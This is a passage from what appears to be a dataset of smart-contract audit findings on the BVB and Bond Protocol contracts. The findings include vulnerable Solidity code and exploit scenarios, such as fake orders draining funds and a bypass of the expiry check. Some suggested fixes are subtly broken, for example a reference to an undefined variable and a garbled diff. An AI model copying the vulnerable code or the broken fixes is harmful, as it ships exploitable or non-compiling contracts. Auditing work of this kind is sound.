can't receive NFTs, their orders will be matched, the bear will be able to withdraw their assets, but the bull's NFT will remain stuck in the BVB protocol contract.","```\\ntry IERC721(order.collection).safeTransferFrom(bear, bull, tokenId) {}\\ncatch (bytes memory) {\\n // Transfer NFT to BvbProtocol\\n IERC721(order.collection).safeTransferFrom(bear, address(this), tokenId);\\n // Store that the bull has to retrieve it\\n withdrawableCollectionTokenId[order.collection][tokenId] = bull;\\n}\\n\\nuint bearAssetAmount = order.premium + order.collateral;\\nif (bearAssetAmount > 0) {\\n 
// Transfer payment tokens to the Bear\\n IERC20(order.asset).safeTransfer(bear, bearAssetAmount);\\n}\\n```\\n" +Attackers can use `reclaimContract()` to transfer assets in protocol to address(0),high,"`reclaimContract()` would transfer payment tokens to `bulls[contractId]`. An attacker can make `reclaimContract()` transfer assets to address(0).\\nAn attacker can use a fake order to trick `reclaimContract()`. The fake order needs to meet the following requirements:\\n`block.timestamp > order.expiry`.\\n`!settledContracts[contractId]`.\\n`!reclaimedContracts[contractId],`.\\nThe first one is easy to fulfilled, an attacker can decide the content of the fake order. And the others are all satisfied since the fake order couldn't be settled or reclaimed before.\\n```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, ""NOT_EXPIRED_CONTRACT"");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], ""SETTLED_CONTRACT"");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], ""RECLAIMED_CONTRACT"");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\n",There are multiple solutions for this problem.\\ncheck `bulls[contractId] != address(0)`\\ncheck the order is matched `matchedOrders[contractId].maker != address(0)`,An attacker can use this vulnerability to transfer assets from BvB to address(0). 
It results in serious loss of funds.,"```\\n function reclaimContract(Order calldata order) public nonReentrant {\\n bytes32 orderHash = hashOrder(order);\\n\\n // ContractId\\n uint contractId = uint(orderHash);\\n\\n address bull = bulls[contractId];\\n\\n // Check that the contract is expired\\n require(block.timestamp > order.expiry, ""NOT_EXPIRED_CONTRACT"");\\n\\n // Check that the contract is not settled\\n require(!settledContracts[contractId], ""SETTLED_CONTRACT"");\\n\\n // Check that the contract is not reclaimed\\n require(!reclaimedContracts[contractId], ""RECLAIMED_CONTRACT"");\\n\\n uint bullAssetAmount = order.premium + order.collateral;\\n if (bullAssetAmount > 0) {\\n // Transfer payment tokens to the Bull\\n IERC20(order.asset).safeTransfer(bull, bullAssetAmount);\\n }\\n\\n reclaimedContracts[contractId] = true;\\n\\n emit ReclaimedContract(orderHash, order);\\n }\\n```\\n" +Transferring Ownership Might Break The Market,medium,"After the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.\\nThe `callbackAuthorized` mapping contains a list of whitelisted market owners authorized to use the callback. When the users call the `purchaseBond` function, it will check at Line 390 if the current market owner is still authorized to use a callback. 
Otherwise, the function will revert.\\n```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n\\nHowever, if the market owner transfers the market ownership to someone else. The market will stop working because the new market owner might not be on the list of whitelisted market owners (callbackAuthorized mapping). As such, no one can purchase any bond token.\\n```\\nFile: BondBaseSDA.sol\\n function pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n newOwners[id_] = newOwner_;\\n }\\n```\\n","Before pushing the ownership, if the market uses a callback, implement an additional validation check to ensure that the new market owner has been whitelisted to use the callback. 
This will ensure that transferring the market ownership will not break the market due to the new market owner not being whitelisted.\\n```\\nfunction pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n// Add the line below\\n if (markets[id_].callbackAddr != address(0) && !callbackAuthorized[newOwner_])\\n// Add the line below\\n revert newOwnerNotAuthorizedToUseCallback();\\n newOwners[id_] = newOwner_;\\n}\\n```\\n","After the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.","```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n" +Market Price Lower Than Expected,medium,"The market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. 
This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\n","Ensure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\n","Loss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. 
Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.","```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n" +Teller Cannot Be Removed From Callback Contract,medium,"If a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) 
external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.","In the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.","```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n" 
+`BondAggregator.findMarketFor` Function Will Break In Certain Conditions,medium,"`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. This will cause the entire for-loop to ""break"" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. 
In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\n",Consider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.,"The find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. 
The market makers affected by this issue will lose the opportunity to sell their bond tokens.","```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n" +Debt Decay Faster Than Expected,medium,"The debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. 
At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n","When computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\n","When the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\n","```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n" +Fixed Term Bond tokens can be minted with non-rounded expiry,medium,"Fixed Term Tellers intend to mint tokens that expire once per day, to consolidate liquidity and create a uniform experience. However, this rounding is not enforced on the external `deploy()` function, which allows for tokens expiring at unexpected times.\\nIn `BondFixedTermTeller.sol`, new tokenIds are deployed through the `_handlePayout()` function. 
The function calculates the expiry (rounded down to the nearest day), uses this expiry to create a tokenId, and — if that tokenId doesn't yet exist — deploys it.\\n```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n\\nThis successfully consolidates all liquidity into one daily tokenId, which expires (as expected) at the time included in the tokenId.\\nHowever, if the `deploy()` function is called directly, no such rounding occurs:\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n{\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // Only creates token if it does not exist\\n if (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, underlying_, expiry_);\\n }\\n return tokenId;\\n}\\n```\\n\\nThis creates a mismatch between the tokenId time and the real expiry time, as tokenId is calculated by rounding the expiry down to the nearest day:\\n```\\nuint256 tokenId = uint256(\\n keccak256(abi.encodePacked(underlying_, expiry_ / uint48(1 days)))\\n);\\n```\\n\\n... 
while the `_deploy()` function saves the original expiry:\\n```\\ntokenMetadata[tokenId_] = TokenMetadata(\\n true,\\n underlying_,\\n uint8(underlying_.decimals()),\\n expiry_,\\n 0\\n);\\n```\\n","Include the same rounding process in `deploy()` as is included in _handlePayout():\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n {\\n expiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // rest of code\\n```\\n","The `deploy()` function causes a number of issues:\\nTokens can be deployed that don't expire at the expected daily time, which may cause issues with your front end or break user's expectations\\nTokens can expire at times that don't align with the time included in the tokenId\\nMalicious users can pre-deploy tokens at future timestamps to ""take over"" the token for a given day and lock it at a later time stamp, which then ""locks in"" that expiry time and can't be changed by the protocol","```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n" +Fixed Term Teller tokens can be created with an expiry in the past,high,"The Fixed Term Teller does not allow tokens to be created with a timestamp in the past. This is a fact that protocols using this feature will expect to hold and build their systems around. 
However, users can submit expiry timestamps slightly in the future, which correlate to tokenIds in the past, which allows them to bypass this check.\\nIn `BondFixedTermTeller.sol`, the `create()` function allows protocols to trade their payout tokens directly for bond tokens. The expectation is that protocols will build their own mechanisms around this. It is explicitly required that they cannot do this for bond tokens that expire in the past, only those that have yet to expire:\\n```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n\\nHowever, because tokenIds round timestamps down to the latest day, protocols are able to get around this check.\\nHere's an example:\\nThe most recently expired token has an expiration time of 1668524400 (correlates to 9am this morning)\\nIt is currently 1668546000 (3pm this afternoon)\\nA protocol calls create() with an expiry of 1668546000 + 1\\nThis passes the check that `expiry_ >= block.timestamp`\\nWhen the expiry is passed to `getTokenId()` it rounds the time down to the latest day, which is the day corresponding with 9am this morning\\nThis expiry associated with this tokenId is 9am this morning, so they are able to redeem their tokens instantly","Before checking whether `expiry_ < block.timestamp`, expiry should be rounded to the nearest day:\\n```\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n```\\n","Protocols can bypass the check that all created tokens must have an expiry in the future, and mint tokens with a past expiry that can be redeemed immediately.\\nThis may not cause a major problem for Bond Protocol itself, but protocols will be building on top of this feature without expecting this behavior.\\nLet's consider, for example, a protocol that builds a mechanism where users can stake some asset, and the protocol will trade payout tokens to create bond tokens for them at a discount, with the assumption that they will expire in the future. 
This issue could create an opening for a savvy user to stake, mint bond tokens, redeem and dump them immediately, buy more assets to stake, and continue this cycle to earn arbitrage returns and tank the protocol's token.\\nBecause there are a number of situations like the one above where this issue could lead to a major loss of funds for a protocol building on top of Bond, I consider this a high severity.",```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n +findMarketFor() missing check minAmountOut_,medium,"BondAggregator#findMarketFor() minAmountOut_ does not actually take effect,may return a market's ""payout"" smaller than minAmountOut_ , Causes users to waste gas calls to purchase\\nBondAggregator#findMarketFor() has check minAmountOut_ <= maxPayout but the actual ""payout"" by ""amountIn_"" no check greater than minAmountOut_\\n```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n","```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? 
payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n- if (payouts[i] > highestOut) {\\n+ if (payouts[i] >= minAmountOut_ && payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n","The user gets the optimal market through BondAggregator#findMarketFor(), but incorrectly returns a market smaller than minAmountOut_, and the call to purchase must fail, resulting in wasted gas","```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n" +Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From Market,medium,"The current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. 
If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. However, he could still purchase the 50 bond tokens in the current transaction.","Considering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.","In the event that the price of the quote token falls to almost zero (e.g. 
0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.","```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n" +Create Fee Discount Feature Is Broken,medium,"The create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. 
As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\n",Implement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\n,"The create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. 
As such, the users will not obtain any discount from the protocol when using the create function.","```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n" +Auctioneer Cannot Be Removed From The Protocol,medium,"If a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\n","In the event that a whitelisted Auctioneer is found to be vulnerable and has been 
actively exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.",```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n +BondBaseSDA.setDefaults doesn't validate inputs,medium,"BondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n 